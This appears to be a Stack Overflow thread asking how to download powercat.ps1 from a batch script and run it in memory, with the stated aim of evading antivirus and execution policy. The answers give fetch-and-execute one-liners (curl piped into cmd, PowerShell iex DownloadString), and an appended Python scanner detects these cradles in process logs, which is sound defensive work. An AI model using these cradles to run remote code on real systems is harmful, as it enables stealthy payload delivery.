8

In my batch script, I am trying to download and execute a powershell script remotely. Here is the URL:

https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

I want to download the file into memory (without touching disk), for several reasons:

  1. It bypasses AV detection
  2. It bypasses Powershell executionpolicy, so there's no need for the powershell -nop -ep bypass that causes AV detection
  3. Won't throw unnecessary syntax errors
  4. You can directly use functions defined inside the .ps1 script

Obviously I can use certutil:

certutil -urlcache -split -f <url>

but I don't want the file to hit disk, which can cause AV detection.
The same thing can be done easily using other languages, like PowerShell:

(New-Object Net.WebClient).DownloadString($url)

OR

(New-Object IO.StreamReader([Net.HttpWebRequest]::Create($url).GetResponse().GetResponseStream())).ReadToEnd()

I know batch isn't the best language to do this, but is it possible? (I want pure batch)

ScriptKidd

  • Does this answer your question? [Is it possible to run an .exe or .bat file on 'onclick' in HTML](https://stackoverflow.com/questions/18980957/is-it-possible-to-run-an-exe-or-bat-file-on-onclick-in-html) – Owain Esau Feb 19 '20 at 04:03
  • That isn't what I meant. – ScriptKidd Feb 19 '20 at 04:25
  • Read the answer [here](https://stackoverflow.com/questions/37933555/force-batch-file-to-load-to-ram-before-running) by @Jeb. Also follow the link to DBenham's [post](https://stackoverflow.com/questions/20329355/how-to-make-a-batch-file-delete-itself/20333575#20333575) – Gerhard Feb 19 '20 at 06:16
  • @OwainEsau please enlighten me with how exactly that link relates to downloading into memory? – Gerhard Feb 19 '20 at 06:19

3 Answers

2

Download and execute without a temporary file

curl -s https://example.com/test.bat | cmd /v:on /k

Example test.bat

@echo off
(
cls

echo Hello
echo Time: !time!
exit
)

Building the code

As said in [Force batch file to load to RAM before running](https://stackoverflow.com/questions/37933555/force-batch-file-to-load-to-ram-before-running), you can cache a single command block.

There are some limitations:

  • It's running in cmd (not batch) context, so variable expansion is a bit different.
  • Labels can't be used

With this technique you can use the normal batch macro style.

jeb

2

I know you want pure batch, but seriously though, even with the Restricted execution policy of PowerShell, it permits individual commands. See https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7

So it's as simple as

powershell -command iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

loadingnow

  • I already know how to use `DownloadString`, but thank you for pointing out it's pointless to not use powershell. – ScriptKidd Mar 25 '20 at 10:19
  • @HackingAddict1337 But if you are running a powershell script, you still would have to run the powershell program anyway, so why not? – loadingnow Mar 26 '20 at 12:29
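From the defender's side, the command lines shown in jeb's and loadingnow's answers (curl piped into cmd, the DownloadString/iex cradle) and in the question (certutil -urlcache, -ep bypass) are exactly the shapes a SOC looks for in process-creation telemetry. The following Python scanner is an added example, not code from any answer above; the log format, hosts, users and URLs are constructed for it, and a real deployment would read Sysmon Event ID 1 or Security Event 4688 records instead.

```python
import re

# Command-line shapes for the techniques discussed in this thread: curl piped
# into cmd, the PowerShell DownloadString/iex cradle, certutil -urlcache, and
# the "-ep bypass" switch. Patterns are constructed for this example.
CRADLE_PATTERNS = {
    "curl_pipe_cmd": re.compile(r"\bcurl\b[^|]*\|\s*cmd\b", re.IGNORECASE),
    "powershell_downloadstring_iex": re.compile(
        r"\b(iex|invoke-expression)\b.*downloadstring"
        r"|downloadstring.*\b(iex|invoke-expression)\b", re.IGNORECASE),
    "certutil_urlcache": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache.*-f\b", re.IGNORECASE),
    "executionpolicy_bypass": re.compile(r"-(ep|executionpolicy)\s+bypass\b", re.IGNORECASE),
}

# Constructed process-creation records, tab-separated: time, host, user, command line.
# Hosts, users and URLs are made up for this example.
SAMPLE_LOG = (
    "2020-02-19T04:03:11Z\tWS01\tacme\\alice\t"
    "cmd.exe /c curl -s https://example.com/test.bat | cmd /v:on /k\n"
    "2020-02-19T04:05:42Z\tWS01\tacme\\alice\tpowershell -command "
    "iex (New-Object Net.WebClient).DownloadString('https://example.com/script.ps1')\n"
    "2020-02-19T04:07:05Z\tWS02\tacme\\bob\t"
    "certutil -urlcache -split -f https://example.com/tool.ps1 tool.ps1\n"
    "2020-02-19T04:08:20Z\tWS02\tacme\\bob\tpowershell -nop -ep bypass -File C:\\Temp\\tool.ps1\n"
    "2020-02-19T04:09:30Z\tWS03\tacme\\carol\tpowershell -command Get-ChildItem C:\\Users\n"
    "2020-02-19T04:10:00Z\tWS03\tacme\\carol\tcurl -s https://example.com/readme.txt -o readme.txt\n"
)


def classify_command_line(cmdline):
    """Return the names of every cradle pattern that matches one command line."""
    return [name for name, rx in CRADLE_PATTERNS.items() if rx.search(cmdline)]


def scan_log(text):
    """Parse the tab-separated records and return one finding per flagged command line."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmdline = line.split("\t", 3)
        hits = classify_command_line(cmdline)
        if hits:
            findings.append({"time": ts, "host": host, "user": user,
                             "hits": hits, "cmdline": cmdline})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} {f['user']} {','.join(f['hits'])}: {f['cmdline']}")
```

Matching on literal command-line strings is brittle (aliases such as `iwr`, string concatenation, encoded commands), so pair it with PowerShell Script Block Logging (Event ID 4104), which records the decoded script content regardless of how it reached memory.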
-2

To my knowledge, no. Batch reads a file by accessing it via read perms. This means that it would not use the right protocol to access a file on a web server without batch allowing it to be read via FTP.

coffee

  • What I want to do is send an HTTP request to the site via a batch file to copy the content of the remote file. It (should?) have nothing to do with read perms. Also, I'm using `http`, not FTP. – ScriptKidd Feb 19 '20 at 09:43